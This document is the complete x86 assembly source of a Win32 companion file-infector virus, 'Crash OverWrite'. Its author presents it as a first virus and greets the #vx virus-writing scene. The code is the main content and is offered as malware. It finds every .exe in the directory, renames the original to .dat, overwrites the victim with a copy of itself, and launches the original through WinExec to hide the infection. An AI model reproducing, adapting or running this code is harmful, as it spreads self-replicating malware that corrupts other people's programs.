comment *

   Name:  Crash OverWrite :-)
   Coder: BeLiAL
   Type: Companion
   Anything else: NO
   
   This is my first win32 virus.Its only a
   companionvirus but it does his work very
   well.Its perhaps coded not so fine but
   im sure nobody will care.It infects all
   files in the directory and renames
   the victimfile to .dat .Perhaps i will make
   infecting more files...
   Its without payload and any  weapons :)
   It Doesnt infect dos-files correctly.
   Greetings to the whole #vx channel on undernet
  
   BeLiAL
*

  .386
  .model flat
  Locals
  Jumps

  Extrn FindFirstFileA :PROC
  Extrn FindNextFileA  :PROC
  Extrn CreateFileA    :PROC
  Extrn WriteFile      :PROC
  Extrn ReadFile       :PROC
  Extrn GlobalAlloc    :PROC
  Extrn GlobalFree     :PROC
  Extrn ExitProcess    :PROC
  Extrn WinExec        :PROC
  Extrn CopyFileA      :PROC
  Extrn CloseHandle    :PROC
  Extrn SetFilePointer :PROC
  Extrn GetFileSize    :PROC

  .data

  MAX_PATH     EQU 0ffh
  FALSE        EQU 0
  changeoffset EQU 094fh
  winsize      EQU 01h

   FILETIME struct
   dwLowDateTime         DWORD   ?
   dwHighDateTime        DWORD   ?      
   FILETIME ends

   WIN32_FIND_DATA struct
   dwFileAttributes      DWORD   ?
   ftCreationTime        FILETIME <>
   ftLastAccessTime      FILETIME <>        
   ftLastWriteTime       FILETIME <>      
   nFileSizeHigh         DWORD   ?        
   nFileSizeLow          DWORD   ?      
   dwReserved0           DWORD   ?       
   dwReserved1           DWORD   ?       
   cFileName             BYTE MAX_PATH dup(?)
   cAlternate            BYTE 0eh dup(?)   
   ends
   FindFileData    WIN32_FIND_DATA <>

  memptr       dd   0
  counter1     dd   0
  filehandle   dd   0
  filesize     dd   00001000h
  exefile      db  '*.exe',0
  myname       db  'crashoverwrite.exe',0
               dd   0
               dd   0
  secbuffer    dd   0
               dd   0
               dd   0
  searchhandle dd   0
               db  '[Crash OverWrite] coded by BeLiAL'

  .code

start:
  push offset FindFileData
  push offset exefile
  call FindFirstFileA
  mov searchhandle,eax
already_infected:
  mov eax,dword ptr nFileSizeLow.FindFileData
  cmp eax,00001000h
  je find_next_victim
  mov eax,offset cFileName.FindFileData
  jmp find_dot1
find_next_victim:
  push offset FindFileData
  push searchhandle
  call FindNextFileA
  test eax,eax
  jz reanimate
  jmp already_infected
find_dot1:
  cmp byte ptr ds:[eax],'.'
  je next_step1
  add eax,1
  jmp find_dot1
next_step1:
  add eax,1
  push eax
  mov byte ptr ds:[eax],'d'
  add eax,1
  mov byte ptr ds:[eax],'a'
  add eax,1
  mov byte ptr ds:[eax],'t'
  mov ebx,offset cFileName.FindFileData
  mov eax,offset secbuffer
find_dot2:
  mov dh,byte ptr ds:[ebx]
  cmp edx,0
  je next_step2
  mov byte ptr ds:[eax],dh
  add ebx,1
  add eax,1
  jmp find_dot2
next_step2:
  pop eax
  push FALSE
  push offset secbuffer
  mov byte ptr ds:[eax],'e'
  add eax,1
  mov byte ptr ds:[eax],'x'
  add eax,1
  mov byte ptr ds:[eax],'e'
  push offset cFileName.FindFileData
  call CopyFileA
  push FALSE
  push offset cFileName.FindFileData
  push offset myname
  call CopyFileA
open_victim:
  push 0
  push 080h        
  push 3h         
  push 0h          
  push 0h          
  push 0c0000000h  
  push offset FindFileData.cFileName
  Call CreateFileA 
  mov filehandle,eax
  cmp eax,0ffffffffh
  je find_next_victim
getmemory:
  push filesize 
  push 0
  Call GlobalAlloc  ;get the memory
  mov edx,eax
  cmp eax,0
  je close_file
  push edx
copyinmemory:
  push 0
  push offset counter1
  push filesize
  push edx
  push filehandle
  Call ReadFile
  pop edx
  mov dword ptr memptr,edx    ;for later use
  add edx,changeoffset
  mov eax,offset cFileName.FindFileData
modify_victim:
  mov bh,byte ptr ds:[eax]
  mov byte ptr ds:[edx],bh
  cmp bh,0
  je set_pointer
  add eax,1
  add edx,1
  jmp modify_victim
set_pointer:
  push 0
  push 0
  push 0
  push filehandle
  call SetFilePointer
copy_to_file:
  push 0
  push offset counter1
  push filesize
  push memptr
  push filehandle
  call WriteFile
close_file:
  push filehandle
  call CloseHandle
  jmp find_next_victim
reanimate:
  mov eax,offset myname
find_dot3:
  mov bx,word ptr ds:[eax]
  cmp bx,'e.'
  je next_step3
  cmp bx,'E.'      
  je next_step3
  add eax,1
  jmp find_dot3
next_step3:
  add eax,1
  mov byte ptr ds:[eax],'d'
  add eax,1
  mov byte ptr ds:[eax],'a'
  add eax,1
  mov byte ptr ds:[eax],'t'
  add eax,1
  mov byte ptr ds:[eax],00h
that_was_all:
  push winsize
  push offset myname
  call WinExec
final:
  push 0
  call ExitProcess

  ends
  end start